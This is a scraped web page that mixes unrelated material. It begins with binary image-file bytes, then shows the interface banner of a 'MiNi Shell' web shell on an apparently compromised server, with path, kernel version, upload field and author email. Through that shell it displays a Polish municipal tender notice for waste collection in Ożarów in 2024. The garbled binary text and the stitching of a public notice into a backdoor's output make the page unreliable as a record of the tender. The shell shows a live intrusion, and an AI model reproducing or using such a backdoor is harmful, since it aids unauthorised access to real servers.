JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231205/0053114301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług odbioru i transportu odpadów komunalnych z nieruchomości położonych na terenie gminy Ożarów w 2024 roku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ożarów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409850</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stodolna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ożarów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@ozarow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ozarow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług odbioru i transportu odpadów komunalnych z nieruchomości położonych na terenie gminy Ożarów w 2024 roku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a2e9dc27-933c-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00531143</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00053263/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór i transport odpadów komunalnych z nieruchomości położonych na terenie gminy Ożarów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-ozarow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie komunikował się z Wykonawcami za pomocą strony prowadzonego postępowania https://gmina-ozarow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji,w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia<br/>2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (4.5.2016 L 119/38 Dziennik<br/>Urzędowy Unii Europejskiej PL)<br/>Informuję, że:<br/>1. Administratorem Pani/Pana danych jest Gmina Ożarów reprezentowana przez Burmistrza Ożarowa<br/>z siedzibą przy ul. Stodolnej 1, 27-530 Ożarów. Przedstawicielem administratora danych jest InspektorOchrony Danych jest<br/>Małgorzata Musiał, kontakt: adres e-mail: malgorzata.musial@ozarow.pl telefon:<br/>15 86 11 137<br/>2. Pani/Pana dane osobowe będą przetwarzane w celu dopełnienia obowiązków określonych w art. 6<br/>ust. 1 lit. e) RODO.<br/>3. Przysługuje Pani/Panu prawo dostępu do treści danych oraz ich sprostowania, usunięcia lub<br/>ograniczenia przetwarzania, a także prawo sprzeciwu, zażądania zaprzestania przetwarzania i<br/>przenoszenia danych, jak również prawo do cofnięcia zgody w dowolnym momencie oraz prawo do<br/>wniesienia skargi do organu nadzorczego (tj. Prezes Urzędu Ochrony Danych Osobowych).<br/>4. Pani/Pana dane osobowe będą przetwarzane na podstawie przepisów prawa przez okres niezbędny<br/>do realizacji celów przetwarzania wskazanych w pkt. 2, lecz nie krócej niż okres wskazany w<br/>przepisach o archiwizacji lub innych przepisach prawa.<br/>5. Dane udostępnione przez Panią/Pana nie będą podlegały udostępnieniu podmiotom trzecim.<br/>Odbiorcami danych będą tylko instytucje upoważnione z mocy prawa.<br/>6. Dane udostępnione przez Panią/Pana nie będą podlegały profilowaniu.<br/>7. Administrator danych nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.8.2023.JP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Świadczenie usług odbioru i transportu odpadów komunalnych z nieruchomości położonych na terenie gminy Ożarów w<br/>2024 roku”<br/>a) Przedmiotem zamówienia jest:<br/>• odbiór odpadów komunalnych zmieszanych ze wszystkich nieruchomości, na których zamieszkują i nie zamieszkują<br/>mieszkańcy, położonych na terenie gminy Ożarów oraz ich transport do Instalacji Przetwarzania Odpadów Komunalnych<br/>(IPOK) to jest Zakładu Utylizacji Odpadów Komunalnych w Janczycach, gm. Baćkowice.<br/>• odbiór i transport selektywnie zebranych odpadów komunalnych do instalacji przetwarzania wskazanej przez<br/>Zamawiającego zgodnie z hierarchią postępowania z odpadami oraz zasadą bliskości<br/>b) Według złożonych deklaracji odbiór odpadów komunalnych nastąpi od ok. 9000 osób. Liczba nieruchomości – Ok 3450.<br/>c) W gminie Ożarów w 2022 roku zebrano odpadów komunalnych:<br/>- niesegregowane (zmieszane) odpady komunalne- ok 1600 ton<br/>- segregowane odpady – ok 730 ton.<br/>d) Zamawiający przewiduje w okresie obowiązywania umowy tj. 12 miesięcy:<br/>- niesegregowane (zmieszane) odpady komunalne- ok 1600 ton<br/>- segregowane odpady – ok 730 ton) z nieruchomości zamieszkałych i niezamieszkałych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość zbiórek odpadów wielkogabarytowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki , o których mowa w art. 112 ust. 2 ustawy<br/>1) nie podlegają wykluczeniu na podstawie zapisów Część II pkt 2 niniejszej SWZ w zakresie podstaw wykluczenia<br/>2) spełniają następujące warunki udziału w postępowaniu w zakresie:<br/>a) zdolności do występowania w obrocie gospodarczym<br/>( Zamawiający nie precyzuje tego warunku)<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej , o ile wynika to z odrębnych przepisów<br/>Wykonawca musi posiadać uprawnienia do wykonywania działalności polegającej na odbieraniu odpadów komunalnych od<br/>właścicieli nieruchomości<br/>W celu wykazania spełniania przez Wykonawcę warunków Zamawiający żąda następujących dokumentów:<br/>- wpis do rejestru działalności regulowanej w Gminie Ożarów zgodnie z art. 9 c ust 1 Ustawy z dnia 13 września 1996r. o<br/>utrzymaniu czystości i porządku w gminach (Dz.U. z 2021 r., poz. 888 j.t. ze zm.);<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagania wskazane powyżej będą<br/>ocenione łącznie.<br/>Oceny spełniania w/w warunku, zamawiający dokona metodą SPEŁNIA – NIE SPEŁNIA na podstawie złożonego<br/>oświadczenia o spełnianiu warunków udziału w postępowaniu.<br/>c) sytuacji ekonomicznej lub finansowej<br/>( Zamawiający nie precyzuje tego warunku)<br/>d) zdolności technicznej lub zawodowej<br/>d.1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności<br/>technicznej lub zawodowej zamawiający żąda następujących podmiotowych środków dowodowych:<br/>Wykonawca musi wykazać, iż do wykonania zamówienia dysponuje następującym potencjałem technicznym:<br/>a) bazą magazynowo - transportową spełniająca wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r.<br/>w sprawie szczególnych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013<br/>r., poz. 122)<br/>b) flotą samochodową zapewniającą prawidłową i terminową realizację zamówienia, w tym co najmniej:<br/>- dwa pojazdy przystosowane do odbierania odpadów komunalnych zmieszanych z pojemników 1100 l oraz 110l i 120 l.<br/>- jeden pojazd przystosowany do odbioru odpadów komunalnych i segregowanych z urządzeniem HDS i funkcją<br/>kompaktującą do obsługi pojemników półpodziemnych,<br/>- jeden pojazd przystosowany do odbioru selektywnie zebranych odpadów komunalnych z zamontowanym urządzeniem<br/>HDS do obsługi pojemników typu dzwon,<br/>- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.<br/>Po wyborze oferty a przed zawarciem umowy w celu potwierdzenia w/w warunku Wykonawca zobowiązany jest do<br/>przedstawienia wykazu samochodów przeznaczonych do realizacji niniejszego zamówienia wraz z kopiami dowodów<br/>rejestracyjnych pojazdów. Wykaz powinien zawierać rodzaj samochodu, nr rejestracyjny oraz określenie właściciela<br/>(Wykonawca/Podwykonawca/Najem).<br/>Wszystkie pojazdy, którymi Wykonawca będzie dysponował w celu realizacji zamówienia muszą:<br/>a) posiadać system monitorowania pracy umożliwiający automatyczną rejestrację czasu pracy i przebytej drogi pojazdów,<br/>b) być wyposażone w monitoring na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie,<br/>przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju,<br/>Oceny spełniania w/w warunku, Zamawiający dokona metodą SPEŁNIA – NIE SPEŁNIA na podstawie złożonego<br/>oświadczenia o spełnianiu warunków,<br/>d.2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie.<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie posiadanej wiedzy i doświadczenia, jeśli Wnioskodawca<br/>wykaże, że<br/>- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie<br/>wykonał lub wykonuje co najmniej jedną usługę polegającą na odbiorze odpadów komunalnych na rzecz właścicieli<br/>nieruchomości, a każda z tych usług realizowana była przez minimum 12 miesięcy na wartość realizowanej usługi minimum<br/>600000,00 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamiast podmiotowych środków<br/>dowodowych, Zamawiający żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania sporządzone zgodnie z wzorem załącznika nr 4 do oferty,<br/>Uwaga: Oświadczenie składane przez wykonawcę jedynie na żądanie zamawiającego<br/>b) w celu potwierdzenia braku podstaw wykluczenia z udziału w postępowania wykonawca/wykonawcy składają odpis lub informację<br/>z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji; Dotyczy również wszystkich wykonawców wspólnie ubiegających o zamówienie, jak również w odniesieniu do podmiotów<br/>udostępniających zasoby</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>wykazania spełniania przez Wykonawcę warunków Zamawiający żąda następujących dokumentów:<br/>- wpis do rejestru działalności regulowanej w Gminie Ożarów zgodnie z art. 9 c ust 1 Ustawy z dnia 13 września 1996r. o utrzymaniu<br/>czystości i porządku w gminach (Dz.U. z 2021 r., poz. 888 j.t. ze zm.);<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagania wskazane powyżej będą ocenione<br/>łącznie.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej zamawiający żąda następujących podmiotowych środków dowodowych:<br/>Wykonawca musi wykazać, iż do wykonania zamówienia dysponuje następującym potencjałem technicznym:<br/>a) bazą magazynowo - transportową spełniająca wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w<br/>sprawie szczególnych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r., poz.<br/>122)<br/>b) flotą samochodową zapewniającą prawidłową i terminową realizację zamówienia, w tym co najmniej:<br/>- dwa pojazdy przystosowane do odbierania odpadów komunalnych zmieszanych z pojemników 1100 l oraz 110l i 120 l.<br/>- jeden pojazd przystosowany do odbioru odpadów komunalnych i segregowanych z urządzeniem HDS i funkcją kompaktującą do<br/>obsługi pojemników półpodziemnych,<br/>- jeden pojazd przystosowany do odbioru selektywnie zebranych odpadów komunalnych z zamontowanym urządzeniem HDS do<br/>obsługi pojemników typu dzwon,<br/>- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie posiadanej wiedzy i doświadczenia, jeśli Wnioskodawca wykaże, że<br/>- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał<br/>lub wykonuje co najmniej jedną usługę polegającą na odbiorze odpadów komunalnych na rzecz właścicieli nieruchomości, a każda z<br/>tych usług realizowana była przez minimum 12 miesięcy na wartość realizowanej usługi minimum 600000,00 zł brutto</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Części<br/>III ust. 1 pkt 4 SWZ, składa każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie ze wzorem umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gmina-ozarow.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=mainPage</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-13 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com